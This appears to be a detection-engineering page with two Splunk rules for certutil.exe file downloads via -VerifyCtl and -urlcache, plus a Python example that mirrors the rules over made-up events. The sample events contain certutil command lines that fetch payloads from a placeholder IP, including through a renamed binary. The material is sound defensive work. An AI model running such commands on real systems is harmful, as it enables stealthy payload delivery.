Techniques
Sample rules
CertUtil Download With VerifyCtl and Split Arguments
- source: splunk
- techniques:
- T1105
Description
Certutil.exe may download a file from a remote destination using -VerifyCtl. This behavior requires a URL to be passed on the command line. In addition, -f (force) and -split (split embedded ASN.1 elements and save them to files) will be used. It is uncommon for certutil.exe to contact public IP space. During triage, capture any files on disk and review them, and review the reputation of the remote IP or domain in question. Using -VerifyCtl, the file will be written either to the current working directory or to %APPDATA%\..\LocalLow\Microsoft\CryptnetUrlCache\Content\<hash>.
Detection logic
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*verifyctl* Processes.process=*split*) OR Processes.process=*verifyctl* by Processes.dest Processes.user Processes.original_file_name Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `certutil_download_with_verifyctl_and_split_arguments_filter`
CertUtil Download With URLCache and Split Arguments
- source: splunk
- techniques:
- T1105
Description
Certutil.exe may download a file from a remote destination using -urlcache. This behavior requires a URL to be passed on the command line. In addition, -f (force) and -split (split embedded ASN.1 elements and save them to files) will be used. It is uncommon for certutil.exe to contact public IP space, and it is uncommon for certutil.exe to write files to world-writable paths. During triage, capture any files on disk and review them, and review the reputation of the remote IP or domain in question.
Detection logic
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*urlcache* Processes.process=*split*) OR Processes.process=*urlcache* by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.original_file_name Processes.parent_process_id
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `certutil_download_with_urlcache_and_split_arguments_filter`
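Both rules above reduce to the same check over process-creation telemetry: a certutil image, identified by process name or by the PE's original file name, with -verifyctl or -urlcache somewhere on the command line. Note that the SPL clause `(... *verifyctl* ... *split*) OR *verifyctl*` (and likewise for urlcache) makes the -split condition redundant: each rule fires on any -verifyctl or -urlcache invocation, whether or not -split is present. The Python below is an added example, not part of the Splunk content, that mirrors that logic over constructed Sysmon-style events. It accepts both the `-` and `/` option prefixes certutil allows, catches a renamed binary through the original file name, and extracts the URL and flags a responder wants first during triage. The `process_certutil` macro is assumed here to expand to a process-name or original-file-name match; the sample events and IP addresses are made up.

```python
"""Mirror of the two certutil download rules, run over constructed events."""
import re

# Constructed Sysmon-style process-creation events; not real telemetry.
SAMPLE_EVENTS = [
    {"dest": "ws01", "user": "corp\\alice", "process_name": "certutil.exe",
     "original_file_name": "CertUtil.exe", "parent_process_name": "cmd.exe",
     "process": "certutil.exe -urlcache -split -f http://203.0.113.10/payload.txt "
                "C:\\Users\\Public\\payload.txt"},
    {"dest": "ws02", "user": "corp\\bob", "process_name": "certutil.exe",
     "original_file_name": "CertUtil.exe", "parent_process_name": "powershell.exe",
     "process": "certutil.exe -VerifyCtl -f -split https://203.0.113.10/evil.ctl"},
    # Renamed binary: process_name changed, but the PE's original file name was not.
    {"dest": "ws03", "user": "corp\\carol", "process_name": "svc.exe",
     "original_file_name": "CertUtil.exe", "parent_process_name": "explorer.exe",
     "process": "svc.exe /urlcache /f http://203.0.113.10/stage2.bin stage2.bin"},
    # Benign: local hashing, no download verb on the command line.
    {"dest": "ws04", "user": "corp\\dave", "process_name": "certutil.exe",
     "original_file_name": "CertUtil.exe", "parent_process_name": "cmd.exe",
     "process": "certutil.exe -hashfile C:\\temp\\installer.msi SHA256"},
]

RULE_VERIFYCTL = "CertUtil Download With VerifyCtl and Split Arguments"
RULE_URLCACHE = "CertUtil Download With URLCache and Split Arguments"

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def is_certutil(event):
    """Assumed equivalent of the `process_certutil` macro: match the image
    by process name or by PE original file name, case-insensitively."""
    return (event.get("process_name", "").lower() == "certutil.exe"
            or event.get("original_file_name", "").lower() == "certutil.exe")


def options(cmdline):
    """Return the option tokens on a certutil command line, lower-cased,
    with the leading '-' or '/' stripped (certutil accepts either prefix)."""
    return {tok[1:].lower() for tok in cmdline.split() if tok[:1] in "-/"}


def classify(event):
    """Return the rule name the event matches, or None.

    As in the SPL, the presence of -verifyctl / -urlcache is sufficient;
    -split is not required for a hit."""
    if not is_certutil(event):
        return None
    opts = options(event["process"])
    if "verifyctl" in opts:
        return RULE_VERIFYCTL
    if "urlcache" in opts:
        return RULE_URLCACHE
    return None


def triage(event):
    """Pull out what a responder checks first: the remote URL (for reputation
    lookup) and whether the -split and -f flags were actually used."""
    opts = options(event["process"])
    m = URL_RE.search(event["process"])
    return {"url": m.group(0) if m else None,
            "split": "split" in opts,
            "force": "f" in opts}


def run(events=SAMPLE_EVENTS):
    """Evaluate both rules over a batch of events; return (dest, rule, triage) per hit."""
    hits = []
    for e in events:
        rule = classify(e)
        if rule:
            hits.append((e["dest"], rule, triage(e)))
    return hits


if __name__ == "__main__":
    for dest, rule, info in run():
        print(f"{dest}: {rule} -> {info}")
```

Three of the four constructed events fire: the renamed `svc.exe` is caught only because the check also looks at the original file name, which is why the Splunk queries group on `Processes.original_file_name`. The benign `-hashfile` invocation does not match, since neither download verb is present.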